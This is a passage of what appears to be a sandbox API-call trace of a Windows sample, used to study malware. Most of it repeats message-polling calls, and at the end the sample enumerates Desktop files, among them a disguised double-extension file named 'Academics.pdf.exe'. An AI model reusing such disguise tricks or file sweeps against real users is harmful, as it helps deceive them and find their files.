PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.411] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.412] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.413] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.413] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.415] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.415] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.415] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.415] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.415] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.415] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.415] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.416] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfd449fd0, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xfd449fd0, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9e0020f, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0xaa55e0 [0145.417] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfd449fd0, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xfd449fd0, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9e0020f, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0145.417] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45d48680, ftCreationTime.dwHighDateTime=0x1d4c9d5, ftLastAccessTime.dwLowDateTime=0x32b45a40, ftLastAccessTime.dwHighDateTime=0x1d4c87b, ftLastWriteTime.dwLowDateTime=0x32b45a40, ftLastWriteTime.dwHighDateTime=0x1d4c87b, nFileSizeHigh=0x0, nFileSizeLow=0xa1f8, dwReserved0=0x9e0020f, dwReserved1=0x60, cFileName="0AFNgyUK36kK5YHPO1.odp", cAlternateFileName="0AFNGY~1.ODP")) returned 1 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99e5710, ftCreationTime.dwHighDateTime=0x1d4ca34, ftLastAccessTime.dwLowDateTime=0x18807430, ftLastAccessTime.dwHighDateTime=0x1d4c711, ftLastWriteTime.dwLowDateTime=0x18807430, ftLastWriteTime.dwHighDateTime=0x1d4c711, nFileSizeHigh=0x0, nFileSizeLow=0xd6d0, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="0wIFgl.pps", cAlternateFileName="")) returned 1 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.417] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.418] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c31f8d0, ftCreationTime.dwHighDateTime=0x1d4d345, ftLastAccessTime.dwLowDateTime=0xe41c40a0, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0xe41c40a0, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="5EdvDyyb.xls", cAlternateFileName="")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x974a3450, ftCreationTime.dwHighDateTime=0x1d4d511, ftLastAccessTime.dwLowDateTime=0x23e5a160, ftLastAccessTime.dwHighDateTime=0x1d4cf72, ftLastWriteTime.dwLowDateTime=0x23e5a160, ftLastWriteTime.dwHighDateTime=0x1d4cf72, nFileSizeHigh=0x0, nFileSizeLow=0xdc6b, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="6qT95vcU.docx", cAlternateFileName="6QT95V~1.DOC")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91623960, ftCreationTime.dwHighDateTime=0x1d4cb76, ftLastAccessTime.dwLowDateTime=0x11b36480, ftLastAccessTime.dwHighDateTime=0x1d4c6fa, ftLastWriteTime.dwLowDateTime=0x11b36480, ftLastWriteTime.dwHighDateTime=0x1d4c6fa, nFileSizeHigh=0x0, nFileSizeLow=0xdb53, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="81-stuKA.mp4", cAlternateFileName="")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc73ebf20, ftCreationTime.dwHighDateTime=0x1d4d474, ftLastAccessTime.dwLowDateTime=0xa7aee4b0, ftLastAccessTime.dwHighDateTime=0x1d4cc94, ftLastWriteTime.dwLowDateTime=0xa7aee4b0, ftLastWriteTime.dwHighDateTime=0x1d4cc94, nFileSizeHigh=0x0, nFileSizeLow=0x10c90, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="A4XY 5YOfDJ7NlnC.bmp", cAlternateFileName="A4XY5Y~1.BMP")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb284da00, ftCreationTime.dwHighDateTime=0x1d509d6, ftLastAccessTime.dwLowDateTime=0xb31d7080, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xe73f6400, ftLastWriteTime.dwHighDateTime=0x1d509cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfd0d, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="Academics.pdf.exe", 